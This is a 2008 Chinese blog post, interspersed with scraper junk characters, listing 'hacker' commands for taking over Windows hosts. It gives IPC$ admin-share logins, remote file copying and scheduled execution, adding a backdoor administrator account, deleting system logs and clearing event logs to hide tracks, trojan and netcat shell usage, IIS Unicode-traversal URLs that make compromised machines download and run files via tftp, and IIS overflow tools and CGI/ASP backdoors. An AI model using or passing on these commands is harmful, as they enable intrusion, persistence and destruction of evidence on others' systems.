关山漫道雄如铁,而今迈步重头越! 学习中成长,成长中学习!

网管和黑客常用命令总结!看了不要做坏事哦!

上一篇 / 下一篇  2008-06-19 16:35:19 / 个人分类:系统安全

查看( 20 ) / 评论( 0 ) / 评分( 0 / 0 )
爱踢博客社区"b#g2Fy%CnHl,b*o
网管和黑客常用命令总结!看了不要做坏事哦!爱踢博客社区Y` Rx;n
爱踢博客社区:Q `A1Y)t-lS~v,D
常用的几条NET命令:爱踢博客社区Po-g`8blm

!x1}[9U7E0==================================================
1m]u0}u;c0
O PC&n8J1i/N(\0U'y3TT0(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
V)B-PDo5m0爱踢博客社区5\Vyu9p.H4Q#ZL+k
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
:w\;| ^J/? bO7i0爱踢博客社区9qUVC5k
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
)K6} GC|"S0爱踢博客社区%uCH EY*S$`
(查看远程主机时间) net time \\IP地址
,`|o~'x R ]h0爱踢博客社区a"?9^2j*y+V^M
(定时启动某个程序) at \\IP地址 02:18 readme.exe爱踢博客社区5V2}7MFY+z
爱踢博客社区U\.V!|0['dsD
(查看共享) net view \\IP地址
uu L]#iz{0
^/M4U~fHL9dXk0(查看netbios工作组列表) nbtstat -A IP地址爱踢博客社区8Z _#\R(ZI}
爱踢博客社区e@ S+X ~vi
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
8VfP8T6dqkA-A-w0
6?/py4Uh&^0(这两条把自己增加到管理员组): net user 用户名 密码 /add
,\L|%MD3P+i0爱踢博客社区Z/~r"H%R"]V1T ^
net localgroup Administrators 用户名 /add爱踢博客社区7V MK }B"tT

JD)ucNb0(断开连接) net use \\IP地址\ipc$ /delete爱踢博客社区oEj@*?$Q:C}j8V
爱踢博客社区Z*c~W1Q,yjJRl
=====================================================爱踢博客社区n!D'^rNuV
爱踢博客社区3Z'^)]8I B4{?0Z e
擦屁屁:爱踢博客社区 MD$nZ ^X\%M ? ?

$X@ Udp"r*a0del C:\winnt\system32\logfiles\*.*
RB{Tn?0
(a*E&Fg3w0del C:\winnt\system32\config\*.evt
h-?N[kM,o5o#X0爱踢博客社区 Za y.?4H!t ?_
del C:\winnt\system32\dtclog\*.*
T5V Z)~,Y4{]0
2|.p.R*mA0N@X0del C:\winnt\system32\*.log
7E r@lg(Z_2F0爱踢博客社区BwH]&Oo I
del C:\winnt\system32\*.txt
!LXm7t C+F`4J`0
h"S*_$V w0del C:\winnt\*.txt
[1N;kz ce6?jd1I0
)gdj?}3F-I0del C:\winnt\*.log
!Gz%mOBT8\ j0爱踢博客社区;p br-a]
============================爱踢博客社区:~|(Z5x+Ts KNgd

qP*\0w4SW*r_0一、netsvc.exe
"pU_:g3p1su*P$D#I[0
9v#H ogWX%_0下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
P1i'd)}(\bEDv0爱踢博客社区1A8ey T+H/\ b$l?
netsvc /list \\IP地址
l Drz%m,]t2rt0
2^?TOb3{Xnt^B0netsvc schedule \\IP地址 /query
|T i*c{gX(Vreg0
)d a OO8E/yp0netsvc \\IP地址 schedule /start爱踢博客社区o/CD9s`W.@ O#~
爱踢博客社区,@%w-~*nU&};@G @(_
二、OpenTelnet.exe
s*`#g3Qp(|.pqG0爱踢博客社区yI"n?W"dg
远程启动主机的Telnet服务,并绑定端口到7878,例如:爱踢博客社区t(W&q;i:P2Z9v@
爱踢博客社区%BD%IUN Y
OpenTelnet \\IP地址 用户名 密码 1 7878
K!?\ o'qKh.r0爱踢博客社区 iy^L6I,W`Fe|
然后就可以telnet到主机的7878端口,进入DOS方式下:
9fP,UJ(OcN(sU8?0
(jco*Ze0telnet IP地址 7878爱踢博客社区"u+bk6\~/Bh2o1w
爱踢博客社区Lj^!n3o6~l3G?
三、winshell.exe爱踢博客社区 v CHy/Th

+Y*t1K S#h?3h0一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:爱踢博客社区a;|`Q ~y&K LS
爱踢博客社区"c8j"?.E Lhs
p Path (查看winshell主程序的路径信息)爱踢博客社区ny7_\N|g&S2D
爱踢博客社区2D#nLnGh8Jt;[
b reBoot (重新启动机器)爱踢博客社区;eu%S!Cg/^v"FD
爱踢博客社区Y?\.FGEb
d shutDown (关闭机器)爱踢博客社区#Fs6G'QF [p
爱踢博客社区.J&X$~w`},S"^
s Shell (执行后你就会看到可爱的“C:\>”)
.HgL+LRf\7W#e0
0rP E;mky [ e0x eXit (退出本次登录会话,此命令并不终止winshell的运行)
#o\CYS-N/bK0爱踢博客社区*U%]J\:I+D
CMD>http://.../srv.exe(通过http下载其他网站上的文件到运行winshell的机器上)
JW0L'Ex(r0爱踢博客社区/I a-~"zpz0i
四、3389登陆器,GUI方式登录远程主机的
$D)W vo3Nt!J0
?UR [_ri0五、elsave.exe
(]!L&u(MC0爱踢博客社区6d!SWP`
事件日志清除工具爱踢博客社区[ejJd"M4H
爱踢博客社区.Z[.qSX#kA
elsave -s \\IP地址 -l "application" -C
YE1R1SA C'Z4C0
~+R+K.@ j Ax0HH0elsave -s \\IP地址 -l "system" -C爱踢博客社区#tY;Kl x&Nr
爱踢博客社区Z*I p%p0~\t
elsave -s \\IP地址 -l "security" -C
] W.d7l%}0{0
,n0p4xM%FR6L0执行后成功清除应用程序日志,系统日志,安全日志
tJj yP7\+F2i T9`6r s2J0爱踢博客社区3mDjRb
六、hbulot.exe
\P/Yoh2m0
.l:N:y&tv(I2b cNt'k0开启win2kserver和winxp的3389服务
1|J-} @dnG y!d8}0爱踢博客社区?s?&D'KI
hbulot [/r]
kw7s[)[O o0爱踢博客社区W7tGD6Nc
使用/r表示安装完成后自动重起目标使设置生效。
p W5M {.n R)H0爱踢博客社区3F-[:kFD'c
七、nc.exe(netcat.exe)爱踢博客社区8Z |,Mo%[/ya
爱踢博客社区0luACVa
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。爱踢博客社区s"v8TY Zv'F

$E%W3T;uC!Kf0想要连接到某处: nc [-options] hostname port[s] [ports] ...爱踢博客社区.N.JE0P.e)n} w

.k-c#S1OwM+xwuVP0绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
(X4L C[A |0
R/~_ N SR ^0参数:
3J0g4M%ki@0爱踢博客社区1A!p`$]G:Mh)t#p
-e prog 程序重定向,一旦连接,就执行 [危险!!]
%v^B:xd'rd+L+d0爱踢博客社区"I3Fh-zi
-g gateway source-routing hop point[s], up to 8
"h|0{*Z6P$K[0爱踢博客社区0`N R9jo&Z
-G num source-routing pointer: 4, 8, 12, ...爱踢博客社区S5y-f8~nX9e
爱踢博客社区6S a6zx3I#[2Z~9Vm
-h 帮助信息爱踢博客社区?+?mz9s r [
爱踢博客社区 MJ.u)n,f5D
-i secs 延时的间隔
EIW$k P r;A @9k0爱踢博客社区ET&tpLwRs^
-l 监听模式,用于入站连接
$fn1i?6vI5k$Zg0
vE,j rRd0-n 指定数字的IP地址,不能用hostname爱踢博客社区)rX#|Jd8i

'T9f8E-{A"I[0-o file 记录16进制的传输
`"g@ZM[&pL!G#`0
[B4wM z;`,l0-p port 本地端口号爱踢博客社区*bk*L-I`J

t7_ G)c2x0-r 任意指定本地及远程端口爱踢博客社区Vl/p1ea0u?6O
爱踢博客社区 vw!Xjc!b
-s addr 本地源地址爱踢博客社区u1HR&Al|AfD'|

I"G:ofz m+\0-u UDP模式
,@S3U3Z3pqPt%}0爱踢博客社区8b)O*pW-}_(s
-v 详细输出——用两个-v可得到更详细的内容爱踢博客社区L)b8D;L+JX,m
爱踢博客社区F?VWW?"X]P2i-Z
-w secs timeout的时间爱踢博客社区f%w3z1]K

U ky Nx7K kl\^UO8K0-z 将输入输出关掉——用于扫描时
"wr'[lH(Q4D#Yl0
"A K'uQg-y;d0八、TFTPD32.EXE
0C VcL~]7l-hf0
C-Gw)Xc/OFa0把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:爱踢博客社区"cO-p9GrV-?V

_IE%I0CD0http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
:T.Sq ma}f0
T_9lgtXQ0然后可以直接令文件运行:
}Z \)s{v0pC0
?K2x e*rwr8o0http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名爱踢博客社区Xh*d*f(xbWu
爱踢博客社区)p V3RgH/H.gZ-v&qkP
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
'AN+D l:J z0
T|h,w3_v|M2g0一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。爱踢博客社区/SI3GN'YG(n mZV2s
爱踢博客社区;`z$I5`D2d4n2S8}Y
一、一 Xscan命令行运行参数说明:
:@.EK{ ?9i0
]Vq5H`~RE1C0在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。爱踢博客社区7hMZ'|"W
爱踢博客社区1Clk"wj1P3n9_:T
1.命令格式: xscan -host [-]  [其他选项]爱踢博客社区'S1G3i l+[4M s
爱踢博客社区*`a/L@ _o_&y]h1k
xscan -file   [其他选项]爱踢博客社区 _$B6`/n9N Lx

,~ | t!{6Yz0其中 含义如下:
5o1f T`8y_I K*jE0爱踢博客社区P.M}3l1o n j6iw
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
N:?e2A/k0QB0
-b'zcn^Dk0-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);爱踢博客社区t oZ'oM2_Ut#C!@

1BFCd'? Y'O&o0-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);爱踢博客社区2y\S ]?Z

Bh4JlMz0-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
c tv.r ~tH4{2?j0爱踢博客社区c7gfdQ9s!S
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);爱踢博客社区4M2[3_3\!S:JD
爱踢博客社区%Y:F3X,u{/c B4V?
[其他选项] 含义如下:爱踢博客社区t1v$A)a Xu9H{p a

)^e4ls6g6B7XU0-v: 显示详细扫描进度爱踢博客社区"M(}4R?O+M
爱踢博客社区O!S:}\S~i Y,D Y-mul'O
-p: 跳过Ping不通的主机爱踢博客社区THzt#L]8J@@ y6h
爱踢博客社区B'i*Q-T*c1J:C wcA
-o: 跳过没有检测到开放端口的主机
s.`pzhG7?~o0
/v HL'{m+d0-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10
J0mfD-K*X Z(M ~0
8ih ?5w:st{1jR0==============================

导入论坛 引用链接 收藏 分享给好友 管理 举报

TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

Open Toolbar